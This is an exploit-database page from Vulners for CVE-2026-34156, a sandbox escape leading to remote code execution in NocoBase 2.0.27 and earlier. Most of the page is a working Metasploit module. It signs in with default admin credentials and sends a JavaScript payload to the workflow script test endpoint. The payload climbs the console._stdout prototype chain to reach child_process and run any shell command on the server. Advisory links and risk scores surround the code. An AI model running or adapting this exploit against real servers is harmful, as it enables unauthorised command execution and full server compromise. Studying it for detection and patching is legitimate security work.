Vulners
Lucene search
📄 NocoBase 2.0.27 Sandbox Escape / Remote Code Execution
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | Exploit for CVE-2026-34156 | 7 Apr 202608:31 | – | githubexploit |
| Exploit for Improper Control of Dynamically-Managed Code Resources in Nocobase | 2 Jun 202607:24 | – | githubexploit |
 | CVE-2026-34156 | 31 Mar 202613:33 | – | attackerkb |
 | CVE-2026-34156 | 28 Mar 202603:26 | – | circl |
 | Nocobase 安全漏洞 | 31 Mar 202600:00 | – | cnnvd |
 | CVE-2026-34156 | 31 Mar 202613:33 | – | cve |
 | CVE-2026-34156 NocoBase Affected by Sandbox Escape to RCE via console._stdout Prototype Chain Traversal in Workflow Script Node | 31 Mar 202613:33 | – | cvelist |
 | NocoBase 2.0.27 - VM Sandbox Escape | 7 May 202600:00 | – | exploitdb |
 | NocoBase Affected by Sandbox Escape to RCE via console._stdout Prototype Chain Traversal in Workflow Script Node | 30 Mar 202617:16 | – | github |
 | NocoBase - VM Sandbox Escape to Remote Code Execution | 23 Jun 202605:08 | – | nuclei |
10
==================================================================================================================================
| # Title : NocoBase 2.0.27 Sandbox Escape RCE Metasploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.nocobase.com |
==================================================================================================================================
[+] Summary : This code is a Metasploit Auxiliary module designed to exploit a Remote Code Execution (RCE) vulnerability in NocoBase (<= 2.0.27).
It targets a flaw in the server-side script execution engine (flow_nodes) that allows breaking out of the JavaScript sandbox.
[+] POC :
##
# CVE-2026-34156 - NocoBase RCE
# Sandbox escape via console._stdout prototype chain
##
require 'msf/core'
require 'json'
require 'uri'
require 'net/http'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'NocoBase RCE via Sandbox Escape',
'Description' => %q{
This module exploits a sandbox escape in NocoBase (<= 2.0.27)
via prototype chain manipulation leading to RCE.
},
'Author' => ['Indoushka'],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2026-34156']
]
))
register_options([
Opt::RHOST(),
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptString.new('USERNAME', [true, 'Username', '[email protected]']),
OptString.new('PASSWORD', [true, 'Password', 'admin123']),
OptString.new('CMD', [false, 'Command to execute', 'id'])
])
end
def build_payload(cmd)
safe_cmd = cmd.gsub("'", "\\\\'")
<<~JS.strip
const Fn=console._stdout.constructor.constructor;
const proc=Fn('return process')();
const cp=proc.mainModule.require('child_process');
return cp.execSync('#{safe_cmd}',{shell:'/bin/sh'}).toString().trim();
JS
end
def login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/api/auth:signIn'),
'ctype' => 'application/json',
'data' => {
'account' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}.to_json
})
if res && res.code == 200
json = res.get_json_document
if json && json['data'] && json['data']['token']
return json['data']['token']
end
end
nil
end
def exec_cmd(token, cmd)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/api/flow_nodes:test'),
'ctype' => 'application/json',
'headers' => {
'Authorization' => "Bearer #{token}"
},
'data' => {
'type' => 'script',
'config' => {
'content' => build_payload(cmd),
'timeout' => 5000,
'arguments' => []
}
}.to_json
})
return nil unless res
begin
json = res.get_json_document
return json['data']['result'] if json && json['data']
rescue
return res.body
end
nil
end
def run
print_status("Starting NocoBase RCE exploit...")
token = login
if token.nil?
print_error("Login failed")
return
end
print_good("Authenticated successfully")
cmd = datastore['CMD']
print_status("Executing: #{cmd}")
result = exec_cmd(token, cmd)
if result
print_good("Output:\n#{result}")
else
print_error("No output received")
end
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Apr 2026 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 3.19.9
EPSS0.07593
SSVC